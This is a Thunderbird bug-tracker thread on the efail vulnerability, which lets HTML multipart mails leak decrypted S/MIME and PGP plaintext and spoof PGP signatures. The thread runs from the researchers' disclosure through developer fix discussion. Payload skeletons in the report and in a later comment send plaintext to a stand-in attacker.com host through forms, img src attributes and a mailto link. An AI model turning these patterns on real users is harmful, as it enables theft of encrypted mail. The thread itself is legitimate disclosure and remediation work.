Closed Bug 1419417 (CVE-2018-12372) Opened 3 years ago Closed 2 years ago

[efail] S/MIME and PGP decryption oracles can be built with HTML emails

Categories

(Thunderbird :: Security, defect)

52 Branch
defect
Not set
normal

Tracking

(thunderbird_esr52 fixed, thunderbird_esr60 fixed, thunderbird60 fixed, thunderbird61 wontfix, thunderbird62 fixed)

VERIFIED FIXED
Thunderbird 62.0
Tracking Status
thunderbird_esr52 --- fixed
thunderbird_esr60 --- fixed
thunderbird60 --- fixed
thunderbird61 --- wontfix
thunderbird62 --- fixed

People

(Reporter: jens.a.mueller, Assigned: jorgk-bmo)

References

(Depends on 1 open bug, )

Details

(Keywords: sec-high)

Attachments

(18 files, 22 obsolete files)

3.45 KB, text/plain
Details
3.84 KB, message/rfc822
Details
3.33 KB, text/plain
Details
4.06 KB, message/rfc822
Details
4.06 KB, message/rfc822
Details
2.04 KB, text/plain
Details
90.96 KB, image/png
Details
10.32 KB, image/png
Details
20.94 KB, image/png
Details
1.06 KB, patch
mkmelin
: review+
Details | Diff | Splinter Review
14.00 KB, patch
jorgk-bmo
: review+
Details | Diff | Splinter Review
2.63 KB, patch
BenB
: review+
Details | Diff | Splinter Review
11.76 KB, image/png
Details
1.84 KB, text/plain
Details
3.59 KB, message/rfc822
Details
42.35 KB, image/png
Details
1.37 KB, message/rfc822
Details
60.26 KB, image/png
Details
User Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
Build ID: 20170929010941

Steps to reproduce:

In the scope of academic research within the efail project, in cooperation with Ruhr-University Bochum and FH Münster, Germany we discovered various security issues in Thunderbird: An attacker who is in possession of S/MIME or PGP encrypted messages can embed them into specially crafted HTML mails and re-send them to the intended receiver. When the message is read and decrypted by the receiver, the plaintext is leaked to an attacker-controlled server. Furthermore, this issue allows an attacker to spoof PGP signatures. The root cause for these vulnerabilities lies in the way Thunderbird handles multipart messages. The general cause is present since Thunderbird version 0.1, released in 2003.

All issues are present in the current Thunderbird version 52.4.0 (if not stated otherwise).

********************************************************************************
*** General Cause: Multipart messages are rendered as a single HTML document ***
********************************************************************************

Thunderbird internally uses HTML to display emails. If a message consists of multiple parts, all parts are put into a single HTML document, separated by a <br>, <fieldset> and <div> tag::

<html>
<head></head>
<body>
<BR><FIELDSET CLASS="mimeAttachmentHeader"></FIELDSET><BR/>
<div class="moz-text-html" lang="x-western">*part-01*</div>
<BR><FIELDSET CLASS="mimeAttachmentHeader"></FIELDSET><BR/>
<div class="moz-text-html" lang="x-western">*part-02*</div>
etc.
</body>
</html>

This is dangerous to be used in combination with cryptography, because it allows an attacker to wrap encrypted or signed content into her own HTML/CSS code:

multipart/mixed
   |--- Content-Type: text/html
   |    [arbitrary HTML or CSS]
   |--- [enc or signed messages]
   +--- Content-Type: text/html
        [arbitrary HTML or CSS]


****************************************
*** Issue A: Leaking encrypted mails ***
****************************************

/Attacker model/: Attacker is in possession of S/MIME or PGP/MIME encrypted messages, which she may have obtained as passive man-in-the-middle or by actively hacking into the victim's mail server or gateway

/Attacker's goal/: Leak the plaintext by wrapping the ciphertext into an HTML mail sent to and decrypted by the victim

-------------------------------------------------------------
*Proof of concept 1: Leaking plaintext through reply/forward*
-------------------------------------------------------------

Prerequisites:
- victim reads and composes messages in HTML
- victim replies or forwards the message

Attack:
The attacker can hide the encrypted part, for example, in an iframe:

multipart/mixed
   |--- Content-Type: text/html
   |    Please answer to this email
   |    <iframe width="1" height="1" frameborder="0">
   |--- Content-Type: multipart/encrypted
   |--- Content-Type: application/pkcs7-mime
   +--- Content-Type: text/html
        </iframe>

The encrypted part is decrypted as soon as the victim reads the mail. If the victim replies to or forwards the mail, the decrypted plaintext will be sent, hidden in the invisible iframe and without the victim noticing. Note that this variant of the attack only works if message bodys are viewed as original HTML (default) *and* the user checked `compose messages in HTML format' (non default). Also note that hundreds of collected S/MIME or PGP/MIME ciphertexts can be embedded in the multipart mail and all the plaintexts leaked with one single reply.

----------------------------------------------------------
*Proof of concept 2: Leaking plaintext through HTML forms*
----------------------------------------------------------

Prerequisites:
- victim reads messages in HTML
- victim submits an HTML form by clicking on an area in the message

Attack:
Another variant of the attack, which works since Thunderbird 3.0 is using HTML forms to leak the plaintext:

multipart/mixed
   |--- Content-Type: text/html
   |    <form action="https://attacker.com/leak" method="post">
   |    <button type="submit">
   |    <textarea
   |--- Content-Type: multipart/encrypted
   +--- Content-Type: application/pkcs7-mime

Again, the plaintext for hundreds of collected S/MIME or PGP/MIME ciphertexts could be leaked by a single form submission. The user still has to actively submit the form, but with CSS it is possible to make the form being submitted if the user clicks *somewhere* into the (harmless) message shown to him which may even security-aware users. Other variants may include setting up fake scrollbars or Thunderbird warnings that submit the form if clicked.

-------------------------------------------------------------
*Proof of concept 3: Leaking plaintext through src attribute*
-------------------------------------------------------------

Prerequisites:
- victim reads messages in HTML
- victim allows remote content (further attack variants possible, see below)

Attack:
Another variant of this attack is to use the HTML src attribute, for example, for invisible iframes or image tags to leak the plaintext:

multipart/mixed
   |--- Content-Type: text/html
   |    <img src='https://attacker.com/
   |--- Content-Type: multipart/encrypted
   |--- Content-Type: application/pkcs7-mime
   +--- Content-Type: text/html
        '>

After decryption, the plaintext is urlencoded and sent as HTTP GET request to the attacker if the user allows remote content to be loaded. To encourage this, there are various options:

- The attacker may spoof the mail address to a `trusted' source which the victim already has whitelisted (for example, some company which requires remote image for their mails being readable)

- The attacker may sent a fake newsletter/spam mail and leak the plaintext by tempting the victim to click on a `Click here to unsubscribe' link

- From Thunderbird 12.0 to 52.0.1, remote content had automatically been loaded if a news:// uri schemes was used in the HTML src attribute which could be used to leak the plaintext to a NNTP server

- In the current version (52.4.0), Thunderbird can be tricked into thinking a mail is an RSS feed if the mail begins with certain headers:
  From - Fri Nov 17 20:13:09 2017
  X-Mozilla-Status2: 00000040
Note that this seems to work only for local (Movemail) message setups, not if the mail is fetched via IMAP or POP3

- In the current version (52.4.0), mailto links can be used to force an HTML context (even if the user has set messages to be neither viewed nor composed in HTML format). While most html tags seem to be filtered, <video poster="url"> gets through and automatically triggers a connection:
  mailto:?html-body=%3Cvideo%20poster%3D%22http%3A%2F%2Fattacker.com%22%3E">
Note however, that this can probably not be used to leak plaintext because we have not found a way to define multipart messages to be included in mailto: links

- There may be other bypasses for remote content blocking like <link preconnect="..."> which we reported in October (bug 1408867)

Note that again multiple S/MIME and PGP/MIME messages can be leaked in a single mail that is read and decrypted. There seems to be an upper limited of 1024kB for the length of HTTP GET requests sent by Thunderbird, but an attacker can include multiple HTML tags with src attributes in case the messages should exceed this limit.

Find attached three emails which leak S/MIME and PGP/MIME encrypted messages to localhost:8080. For a proof of concept, you need to replace the encrypted parts with S/MIME or PGP/MIME messages you have the private key for, obviously.


*******************************************
*** Issue B: Signature Spoofing Attacks ***
*******************************************

/Attacker model/: Attacker is in possession of a valid OpenPGP signature from the entity to be impersonated, which she may have obtained from email correspondence, public mailing lists, signed software packages, signed GitHub commits, etc; this should be a realistic scenario, so we don't even need an NSA-like attacker

/Attacker's goal/: Given her own text, the attacker wants to spoof a correct signature to be displayed by Enigmail

There are various ways to achieve this goal. CSS can be used to hide the signed part (for example, by setting the font size or color). Furthermore, the signed part can be embedded by and therefore hidden in HTML tags.

Note that this attack does not seem to work for S/MIME because Thunderbird's S/MIME implementation only shows a valid signature if the whole message (including all parts) is correctly signed.

-------------------------------------------------------------------
*Proof of concept 1: Signature spoofing with CSS and plaintext tag*
-------------------------------------------------------------------

Prerequisites:
- victim reads messages in HTML

Attack:
The signed part can be hidden by setting the font color to the default background color (white). Furthermore, the <plaintext> tag can be used to get rid of the border being displayed:

multipart/mixed
   |--- Content-Type: text/html
   |    [Arbitrary text inserted by the attacker]
   |    <div style="color:white"><plaintext>
   +--- Content-Type: multipart/signed
        [PGP signed part]

------------------------------------------------------------------
*Proof of concept 2: Signature spoofing with invisible iframe tag*
------------------------------------------------------------------

Prerequisites:
- victim reads messages in HTML

Attack:
The signed part can be hidden in an invisible iframe:

multipart/mixed
   |--- Content-Type: text/html
   |    [Arbitrary text inserted by the attacker]
   |    <iframe width="1" height="1" frameborder="0"
   +--- Content-Type: multipart/signed
        [PGP signed part]

Find attached two emails which are displayed as correctly signed by Phil Zimmermann in Thunderbird/Enigmail while the attacker can completely alter the actual text that is shown to the user.
Attachment #8930484 - Attachment description: 01-dec-pgp-smime-html-reply.eml → Decryption oracle PoC 1: Leaking plaintext through reply/forward
Attachment #8930484 - Attachment filename: 01-dec-pgp-smime-html-reply.eml → A1-dec-pgp-smime-html-reply.eml
Attachment #8930485 - Attachment description: 02-dec-pgp-smime-html-form.eml → Decryption oracle PoC 2: Leaking plaintext through HTML forms
Attachment #8930485 - Attachment filename: 02-dec-pgp-smime-html-form.eml → A2-dec-pgp-smime-html-form.eml
Attachment #8930486 - Attachment description: 03-dec-pgp-smime-html-src.eml → Decryption oracle PoC 3: Leaking plaintext through src attribute
Attachment #8930486 - Attachment filename: 03-dec-pgp-smime-html-src.eml → A3-dec-pgp-smime-html-src.eml
Attachment #8930487 - Attachment description: 04-sig-pgp-css-and-plaintext.eml → Signature spoofing PoC 1: Impersonating Phil Zimmermann with CSS and plaintext tag
Attachment #8930487 - Attachment filename: 04-sig-pgp-css-and-plaintext.eml → B1-sig-pgp-css-and-plaintext.eml
Attachment #8930488 - Attachment description: 05-sig-pgp-invisible-iframe.eml → Signature spoofing PoC 2: Impersonating Phil Zimmermann with invisible iframe tag
Attachment #8930488 - Attachment filename: 05-sig-pgp-invisible-iframe.eml → B2-sig-pgp-invisible-iframe.eml
Keywords: sec-high
See Also: → 1420217
CCing some additional Thunderbird folks, hoping this will get their attention.
Jörg, can you take this? Let me know if we can be of any help.
Assignee: nobody → jorgk
Flags: needinfo?(jorgk)
See bug 1240290 comment #54.
Flags: needinfo?(jorgk)
Joshua promised to take a look at this after work. Thanks Joshua <3
Assignee: jorgk → Pidgeot18
Flags: needinfo?(Pidgeot18)
Some comments:
(In reply to Jens Müller from comment #0)
> ****************************************
> *** Issue A: Leaking encrypted mails ***
> ****************************************

The effective cause of the problem is that libmime produces a single HTML page by concatenating all of the parts together. This means that the HTML sections can already bleed together (and there are definitely bugs on this that I'm not going to try to find right now). The easy way to fix this would be to put every every document in a separate <iframe>, but we would need bug 80713 to avoid the fixed height issue, and that bug's been on nobody's radar for years. Maybe the fact that there's a security bug in not doing so could light a fire, but I wouldn't hold out high hopes.

> ----------------------------------------------------------
> *Proof of concept 2: Leaking plaintext through HTML forms*
> ----------------------------------------------------------

We actually support submitting forms? o_O

My memory isn't entirely wrong: judging from bug 533545 comment 76, supporting form submission in HTML email is not an intended feature. It was broken at some point, but apparently we never fully ripped out the breakage.

> - In the current version (52.4.0), Thunderbird can be tricked into thinking
> a mail is an RSS feed if the mail begins with certain headers:
>   From - Fri Nov 17 20:13:09 2017
>   X-Mozilla-Status2: 00000040
> Note that this seems to work only for local (Movemail) message setups, not
> if the mail is fetched via IMAP or POP3

In practice, someone who can inject mail into Movemail is already doing arbitrary file I/O on your machine, which means you've already basically lost the security game.

We do have checks to ignore X-Mozilla-* headers if it comes from elsewhere, but I think we reused the mbox code to handle movemail.

> Note that this attack does not seem to work for S/MIME because Thunderbird's
> S/MIME implementation only shows a valid signature if the whole message
> (including all parts) is correctly signed.

Yes, S/MIME does have a check such that if the encrypted piece isn't the top-level of the message, it ignores the security status information. This is actually baked in the frontend; the backend library blindly passes everything along with a nesting depth, but the frontend drops everything that's not top-level. It sounds like Enigmail isn't doing the same logic, or just setting the nesting depth unconditionally to 1, which needs to be brought up with the Enigmail folks.
Flags: needinfo?(Pidgeot18)
Update from our side: We would like to go full-disclosure in mid April in the scope of an academic paper (covering a whole bunch of email security issues). We think it's a very serious issue: with a single tiny bit of user interaction (or maybe without if the attacker somehow manages to bypass remote content blocking) -- the encrypted mails of years can be leaked.

One workaround would be to not render HTML content in encrypted mails (Enigmail does this already for PGP/INLINE) or consequently block remote content (not give the user an option!), forms etc. for encrypted content and not to allow users to click on links etc. In respect to bug 1411592, this seems to be necessary anyway.
Attachment #8930484 - Attachment mime type: message/rfc822 → text/plain
(In reply to Joshua Cranmer [:jcranmer] from comment #9)
> The easy way to fix this would
> be to put every document in a separate <iframe>,
This was last attempted in bug 1297653 (now a duplicate of ancient bug 31052) to avoid bleeding of CSS ...

> but we would need bug 80713 to avoid the fixed height issue, ...
... without even knowing about that issue.
(In reply to Joshua Cranmer [:jcranmer] from comment #9)
> Yes, S/MIME does have a check such that if the encrypted piece isn't the
> top-level of the message, it ignores the security status information. This
> is actually baked in the frontend; the backend library blindly passes
> everything along with a nesting depth, but the frontend drops everything
> that's not top-level. It sounds like Enigmail isn't doing the same logic, or
> just setting the nesting depth unconditionally to 1, which needs to be
> brought up with the Enigmail folks.

Patrick, is this maybe already fixed in Enigmail 2.0? Anything you could do to secure things on your side?
Flags: needinfo?(patrick)
I fixed these issues in Enigmail 1.9.9 already (without announcing it).

The only exception is Encryption PoC 2 -- I cannot see how I could fix this in Enigmail.
Flags: needinfo?(patrick)
Nice, that sounds great! So this means all we'd need to do to fix the bug is to disable form submissions? That seems simple enough. Magnus, do you have cycles to look at this in the next week?
Flags: needinfo?(mkmelin+mozilla)
Depends on: CVE-2018-5185
Looked at the form submission issue, fixing it in bug 1450345.

I did not verify, but I don't think the other issues regarding decryption reported in this bug are fixed.

Patrick, did you only mean the "Issue B: Signature Spoofing Attacks" are fixed. Or how is the "Issue A: Leaking encrypted mails" problem resolved?
Flags: needinfo?(mkmelin+mozilla) → needinfo?(patrick)
Issue B is fixed in Enigmail, that's a pure UI thing.

Issue A is fixed as far as I can:
- PoC 1 is "fixed" in Enigmail by displaying a warning to the user if a "suspicious" type of PGP/MIME (or inline-PGP) structure is detected.
- PoC 2 and PoC 3: AFAICT this cannot be addressed by Enigmail
Flags: needinfo?(patrick)
To recapitulate:

+--------------------------------------------------------------------------------+
|                | S/MIME                         | OpenPGP                      |
|----------------+--------------------------------+------------------------------|
| Issue A, PoC 1 | fixed? (dec only if top-level) | mitigated in Enigmail 1.9.9  |
| Issue A, PoC 2 | fixed in Bug 1450345 (TB 60)   | fixed in Bug 1450345 (TB 60) |
| Issue A, PoC 3 | fixed? (dec only if top-level) |                              |
|----------------+--------------------------------+------------------------------|
| Issue B, PoC 1 | not vulnerable                 | fixed in Enigmail 1.9.9      |
| Issue B, PoC 2 | not vulnerable                 | fixed in Enigmail 1.9.9      |
+--------------------------------------------------------------------------------+

S/MIME, Issue A, PoC 1/3 -- Question to @jcranmer:
--------------------------------------------------
Since when is it fixed? Just asking because TB 52.6 still allows partly S/MIME encrypted mails, it just does not allow partly S/MIME signed mails (therefore Issue B, PoC 1/2 is not vulnerable for S/MIME). Such a fix would mean that emails with e.g. only the attachment encrypted will no longer be decrypted, correct?

OpenPGP, Issue A, PoC 3 -- Possible workarounds:
--------------------------------------------------
- separate DOM for each HTML body part (best fix, but hardest to implement)
- same fix(?) as for S/MIME (drawback: partly encrypted mails will no longer be decrypted)
- do not give user an option to load remote content in encrypted mails (just a workaround!)

Last question: will a CVE be assigned to this with the fixing TB release?
Flags: needinfo?(Pidgeot18)
Maybe we can close this bug.
It *looks* like this is being dealt with and discussed in bug 1411592.
Unfortunately this bug has several parts, so many are fixed but not all. We still need to fix "Decryption oracle PoC 1: Leaking plaintext through reply/forward" AFAICT.
Bug 1411592 only fixed issues related to external content. The issue of message parts interacting is still open, see bug 1411592 comment #11 and above, and comment #11 here. I haven't made any progress in bug 1297653.
Note:

- Issue A, PoC 1 (leak plaintext via reply/forward) still works in
  TB-nightly for S/MIME encrypted messages (mitigated in Enigmail)

- Issue A, PoC 3 (leak plaintext via remote content) still works in
  TB-nightly for S/MIME encrypted messages (and for PGP too I guess)

This has *not* been fixed by bug 1411592. The problem for Issue A, PoC 3 is that remote content *within* encrypted messages is disabled now (bug 1411592), but in *this* bug ("direct exfiltration") we wrap the encrypted MIME part and prepend <img src="http://attacker.com/ in a previous MIME part in the same email -- where remote content still seems to be allowed. TB puts all together in a single HTML document to be rendered.

All those plaintext leaks (Issue A, Poc *) are based on the problem that multiple MIME parts are put into the same DOM. This can probably not be changed fast. But what about the following quick fix: Do not decrypt S/MIME and OpenPGP encrypted messages if they are not top-level (within in the MIME tree). This breaks partly encrypted messages but they should not happen often in practice (e.g. only-encrypt-the-attachment).
(In reply to Jens Müller from comment #17)
> S/MIME, Issue A, PoC 1/3 -- Question to @jcranmer:
> --------------------------------------------------
> Since when is it fixed? Just asking because TB 52.6 still allows partly
> S/MIME encrypted mails, it just does not allow partly S/MIME signed mails
> (therefore Issue B, PoC 1/2 is not vulnerable for S/MIME). Such a fix would
> mean that emails with e.g. only the attachment encrypted will no longer be
> decrypted, correct?

We don't indicate that partly S/MIME mail is anything different from regular email. While the user could still see the decrypted email, there would be no indication that the email was encrypted in the first place unless the user desired to view source (or wondered why the message couldn't be found when searching message bodies).

> Last question: will a CVE be assigned to this with the fixing TB release?

I play no role in that process.
Flags: needinfo?(Pidgeot18)
Depends on: CVE-2018-5162
Attachment #8930486 - Attachment mime type: message/rfc822 → text/plain
Attached patch bug1419417_efail_reply_fwd.patch (obsolete) — Splinter Review
Fix PoC 1 by only forwarding/replying to encrypted messages as plaintext. 
That is not the neatest fix, but at least it's safe. 

This should be the last of the attack vectors.

We can try to think of a better fix but time is running up. 
What we could do is parse each part separately into a document, then insert each element after one another. But libmime is so much magic that it's really hard to follow where to put the logic.
Assignee: Pidgeot18 → mkmelin+mozilla
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
Attachment #8973795 - Flags: review?(jorgk)
Comment on attachment 8973795 [details] [diff] [review]
bug1419417_efail_reply_fwd.patch

Review of attachment 8973795 [details] [diff] [review]:
-----------------------------------------------------------------

::: mailnews/compose/src/nsMsgCompose.cpp
@@ +1031,5 @@
>  
>    rv = composeService->DetermineComposeHTML(m_identity, format, &m_composeHTML);
>    NS_ENSURE_SUCCESS(rv,rv);
>  
> +  // Make sure we only do plaintext encrypted replies/forwards.

That comment isn't clear. Are you saying that when replying to an encrypted HTLM message or forwarding it, we'll convert the reply or forwarded message to plaintext?

That's what the code appears to do. If the original was encrypted, the new message (reply/forwarded) will be converted to plaintext.

I can't see that this will be very popular. People might want to work around that with using "Edit as new". What happens in that case?
(In reply to Magnus Melin from comment #23)
> Created attachment 8973795 [details] [diff] [review]
> bug1419417_efail_reply_fwd.patch
> 
> Fix PoC 1 by only forwarding/replying to encrypted messages as plaintext. 
> That is not the neatest fix, but at least it's safe. 

I think this is a no-go for many users who use encrypted messages. Here is what I did in Enigmail: I (re-)parse the message to get the message structure (and then interpret the structure. If an unencrypted MIME part as a PGP/MIME encrypted sibling (i.e. MIME parts on the same level), then I display a warning to the user saying that the message may lead to revealing sensitive information. I would also agree that in this case conversion to plain text is a valid option.

See: https://gitlab.com/enigmail/enigmail/blob/master/ui/content/enigmailMsgComposeOverlay.js#L562
Hmm, but mixing of encrypted and non-encrypted is not really needed for this PoC is it?
(In reply to Jorg K (GMT+1) from comment #24)
> That comment isn't clear. Are you saying that when replying to an encrypted
> HTLM message or forwarding it, we'll convert the reply or forwarded message
> to plaintext?

That's what it does yes.
(In reply to Magnus Melin from comment #26)
> Hmm, but mixing of encrypted and non-encrypted is not really needed for this
> PoC is it?

Yes, I think you a have to have a mixture. You have an apparently unencrypted HTML message that contains a hidden encrypted MIME part. The only way to achieve this is by a structure like below, which implies that a multipart/encrypted message is on the same level or below an unencrypted message part:

multipart/mixed 1.1
   |--- Content-Type: text/html 1.1.1
   |    <form action="https://attacker.com/leak" method="post">
   |    <button type="submit">
   |    <textarea
   |--- Content-Type: multipart/encrypted 1.1.2
   

Whether or not 1.1 is a sub-part of an encrypted message does not matter. Once you have the decrypted MIME tree, you need to have a mixture of non-encrypted and encrypted MIME parts. Otherwise the trick of hiding an encrypted message in an unencrypted message cannot work.
Comment on attachment 8973795 [details] [diff] [review]
bug1419417_efail_reply_fwd.patch

Do we want to pursue this solution given ...

(In reply to Patrick Brunschwig from comment #25)
> I think this is a no-go for many users who use encrypted messages.
Attachment #8973795 - Flags: review?(jorgk)
(In reply to Patrick Brunschwig from comment #28)
> Yes, I think you a have to have a mixture. You have an apparently
> unencrypted HTML message that contains a hidden encrypted MIME part.

Is it not allowed to have encrypted parts as siblings? E.g. part 1.1.1 also being encrypted.
Sorry if it's a stupid question :)
(In reply to Magnus Melin from comment #30)
> Is it not allowed to have encrypted parts as siblings? E.g. part 1.1.1 also
> being encrypted.
> Sorry if it's a stupid question :)

It's not a stupid question at all :) It's technically allowed and possible to have encrypted and non-encrypted parts as siblings. However, no email client would ever produce such a message. The only way to achieve such a message structure is to manually craft it, and therefore the user should be warned if he gets such a message.
Agreed with @Patrick. If part 1.1.1 is actually encrypted or not should be irrelevant for the attack (the attacker could do both).

The major problem imho is multiple MIME parts that are bleeding into each other -> attacker-controlled HTML/CSS content is mixed with sensitive, plaintext content, rendered into the same DOM. Given the evolution web standards, other variants of the attack may only be a matter of time. At least I would not trust mail encryption my life (but some people actually have to) :/

Btw, I like Enigmail's handling of PGP/INLINE where the whole email is forced to be rendered as text-only.
(In reply to Jens Müller from comment #32)
> Agreed with @Patrick. If part 1.1.1 is actually encrypted or not should be
> irrelevant for the attack (the attacker could do both).

I'm slightly confused now. Patrick said a mixture is required (comment 28). 

But from later comments, it sounds separately encrypted siblings is technically allowed and possible (for an attacker). The approach Enigmail took of warning if only one sibling was unencrypted would seem still attackable for that case.

> The major problem imho is multiple MIME parts that are bleeding into each
> other

Yes this is unfortunate and something I'd like to change - but it's a larger project to do that properly.
(In reply to Magnus Melin from comment #33)
> But from later comments, it sounds separately encrypted siblings is
> technically allowed and possible (for an attacker). The approach Enigmail
> took of warning if only one sibling was unencrypted would seem still
> attackable for that case.

You're right, my example is not complete. In my example in comment #28 the MIME part 1.1.1 could also be a multipart/encrypted message part which contains a text/html part. Or the structure could be like below, which would probably also be attack-able:

multipart/mixed 1.1
   |--- Content-Type: text/html 1.1.1
   |    <form action="https://attacker.com/leak" method="post">
   |    <button type="submit">
   |    <textarea
   |--- Content-Type: multipart/mixed 1.1.2     
         |--- Content-Type: multipart/encrypted 1.1.2.1


How about the following rule: there should be no "text/html" MIME part earlier in the tree than a "multipart/encrypted" MIME part - after everything earlier in the tree has been decrypted (i.e. tree traversal by depth first). 

I'm not sure how to deal with message/rfc822 MIME parts though (attached messages).
We should make it possible to compose in html again, but for the moment I'd take this as a band-aid.
What exactly is the attack vector? Do you have a test case and can you explain how the patch addresses the attack vector?

I just want to make sure we're not throwing out the baby with the bathwater given Patrick's comment #25:
  "I think this is a no-go for many users who use encrypted messages."
So a "no-go" doesn't appear very attractive even as a band-aid.
Simply put: if you have encrypted messages for A that you want to read, send a mail to A, asking them a question so that A would reply. Craft the mail to secretly (like in the alternative content for a supported element) include the encrypted messages. The reply you get back now have all the content of the messages in decrypted from.

By converting to plain text the unintended messages are either removed in the html->plaintext process, or there clearly visible to the user in the reply window.

You could argue the attack requires you to obtain those encrypted mails, which may be easy or not, depending on what kind of an attacker you are. (Maybe you're the admin of the mail server, then it's easy.) But then again, to protect against these kind of attacks is the motivation to use encryption in the first place. Traffic between mail servers is largely secured nowadays.
Oh, I understand the simple version ;-) Do you have a test message or instructions how to easily construct one? Or would you like me to send you a signed S/MIME message, so you can send a "crafted" encrypted one back?
I'll get back to you in the evening. But basically, in https://bugzilla.mozilla.org/attachment.cgi?id=8930485 the red area would include decrypted content if you had the proper keys. (And would obviously be hidden by styling etc. in the real world)
You mean attachment 8930484 [details], right, since that's the one for reply/forward.
OK, here's an example where I put an S/MIME block I can decrypt into a part of the message.

Upon HTML reply the decrypted text is found visibly in the body of the mail and is shipped out upon send.

Now let's try with the patch.
Attachment #8975458 - Attachment mime type: message/rfc822 → text/plain
Comment on attachment 8973795 [details] [diff] [review]
bug1419417_efail_reply_fwd.patch

As far as I can see, this doesn't work. With the patch applied, the decrypted text is still present invisibly in the composition. Also, the composition is NOT downgraded to plaintext.

Looks like encryptedURIService->IsEncrypted(originalMsgURI, &isEncrypted); will return 'false' since only a message part is encrypted. I don't know, I haven't debugged it.

At least with the example I attached, "forward" doesn't appear to be an attack vector. I don't see the decrypted text anywhere in the forwarded message when inspecting the HTML.
Attachment #8973795 - Flags: review-
I would always run all cited text through the "HTML sanitizer" (Simple HTML). It will strip all funky HTML and leave only basic HTML in there. To avoid other attack vectors, I'd do that for all email, not just encrypted ones. I've seen other security and privacy bugs in HTML Replies, and that would stop them all cold. After all, it is only for quoting/citing.

The HTML sanitizer was made for cases like this: To be secure.

Going down to plaintext (even if only for encrypted mail) is IMHO a little too drastic and not necessary.
Ben, are you sure this would help in all cases? I suspect that you could still get a HTML tag containing hidden text which stems from a MIME part that was invisible at viewing time.
Attached image tb-smime-leak-1.png (obsolete) —
Screenshot, replying to attack email in HTML mode, Sanitized HTML mode and plaintext mode. Screenshot made without encryption for simplicity.

I can make a patch for that.
Attached image tb-smime-leak-2.png
Sorry, labels were inverse. Fixed. Attached again. Sorry for the messup.
Attachment #8975520 - Attachment is obsolete: true
> I suspect that you could still get a HTML tag containing hidden text which stems from a MIME part that was invisible at viewing time.

I'd have to test and check that.

However, just pasting encrypted text somewhere in the body wouldn't automatically decrypt it, would it?

If I understood the attack right, it bases on tricking the user into running a URL, either as <iframe> or <form> or <img> or style sheet or what have you. I am fairly confident that the sanitizer neutralizes all of these URL runs, at least that was its primary design goal.
(In reply to Ben Bucksch (:BenB) from comment #47)
> > I suspect that you could still get a HTML tag containing hidden text which stems from a MIME part that was invisible at viewing time.
> 
> I'd have to test and check that.
> 
> However, just pasting encrypted text somewhere in the body wouldn't
> automatically decrypt it, would it?

No, that wouldn't work.

According to the Efail authors, it's apparently also possible to play tricks with mixing double and single quotes in a clever way in HTML. Is this also sanitized?
For end users, simple short-term mitigation: Enable menu View | Message Body as | Simple HTML.

That should run all HTML mail parts through the sanitizer before it hits other parts of Thunderbird and remove active URLs, at least that's the basic idea. I'll have to test each PoC to check whether one of them slips through, though.
For the moment I'm recommending to use view messages as Plain text, which should prevent any remote URLs.
"Remote URLs"? I thought the case we're discussion here is the "direct exfiltration" where decrypted parts get included invisibly in the reply.
Yes that's the case for trunk/beta. But until 52.8 is out the other cases are an issue.
I think that sanitizing the HTML tree for replies is a good idea.
I think I have a fix.
Magnus, do you mind, if I take this?
Not at all, here you go.
Assignee: mkmelin+mozilla → ben.bucksch
Status: ASSIGNED → NEW
After discussing with Patrick, we both think there are several issues at work here, and that this problem needs 3 different fixes:


1. Separate MIME parts from each other

We currently output a cut-off HTML document, and concatenate that with other MIME parts, and construct a single document out of all these MIME parts. This is the cardinal bug here.

The correct solution here is to jail each MIME part into a separate <iframe type="content"> in the UI.
However, we don't want one scrollbar for each MIME part, but one scroll for the entire body. <iframe seamless> would allow that, but it was never implemented in Firefox and is now dead. We might later find a workaround, but this is more work and can't be done short term.

Together, we had the idea of running the HTML document through the HTML parser. The parser will clean up the HTML and close any open tags and attributes and the serializer will output a complete HTML document. That avoids that we end the MIME part with <img src=" and stops this attack cold.

It's not pretty, it's slower, and it's not a perfect solution, but it should fix the bug here, and all known variants of it.


2. Sanitize quoted HTML

The composer is more vulnerable than the viewer. In the viewer, we assume malicious code and harden against it. Not so in the composer, which assumes that the user enters the data.

After all, this is just a quote/cite. We only need to preserve the essence of it, enough for a citation.

That's why we should sanitize the HTML that we quote from the original message and insert into the user's mail.

This should close a whole class of attacks that
a) attack our composer
b) attack the recipients of our user
   (which could lead to interesting constellations, esp. when it comes to decryption and trust)
So, I think this will be an important protection going forward.


3. Only decrypt, if the entire message is encrypted, not attachments

Normally, if we receive an encrypted email, the entire email will be encrypted. There's little point in leaving part of the message encrypted.

Part of the bug here was that we are automatically decrypting and inlining MIME subparts. That led to that "mixed content". Patrick had no way to stop that "mixed content" in Enigmail, because the code is in libmime.

We should only automatically decrypt a message, if the entire message is encrypted. That's true for all normal encrypted emails.
If an attachment is encrypted, we should simply show it as external attachment. The user can click on it to open or save it.
(In the first version of the patch, I might only allow saving the attachment, not opening it directly by double-click - depending on how difficult it is to implement.)


I have a good part of this already implemented. Patches will follow.
Thanks, Magnus! :-)
Status: NEW → ASSIGNED
Attached patch Sanitize quoted HTML (obsolete) — Splinter Review
This is a fix for 2. Sanitize quoted HTML

I am not completely sure that I found all the necessary places to insert the code. My goal is to sanitize all foreign HTML content that's inserted into the composer, whereby "foreign" means anything not created by our user, anything coming from the network. If anybody knows additional places to cover, please let me know.

I've tested this by
1. setting View | Message body as | Original HTML
2. opening an Amazon HTML email
-> It display with colors and <table> boxes and everything, in the viewer
3. Clicking Reply

Without the patch:
-> The inserted quote has colors, boxes etc.

With the patch:
-> The inserted quote is the sanitized HTML version,
   without colors, with broken remote images (as intended),
   basically just text, but with links etc..
   Same that you get with View | Message Body as | Simple HTML.
Attachment #8976050 - Flags: review?(mkmelin+mozilla)
Comment on attachment 8976050 [details] [diff] [review]
Sanitize quoted HTML

Review of attachment 8976050 [details] [diff] [review]:
-----------------------------------------------------------------

::: mailnews/compose/src/nsMsgCompose.cpp
@@ +694,5 @@
>        // This leaves the caret at the right place to insert a bottom signature.
>        if (aHTMLEditor)
> +      {
> +        // Sanitize the HTML before injecting it into the composer
> +        nsAutoString rawBody(aBuf);

Why a new variable? Can't you call HTMLSanitize(aBuf, ...)?

@@ +3215,5 @@
>      {
>        if (aHTMLEditor)
> +      {
> +        // Sanitize the HTML before injecting it into the composer
> +        nsAutoString rawBody(mMsgBody);

Same here.
I've addressed the nits be removing the unneeded variables and I've added a proper patch header. Not sure why people still think they can submit raw diffs as patches. So reviewers have "Automatic r- if the patch doesn't contain a decent commit message" in their nick.

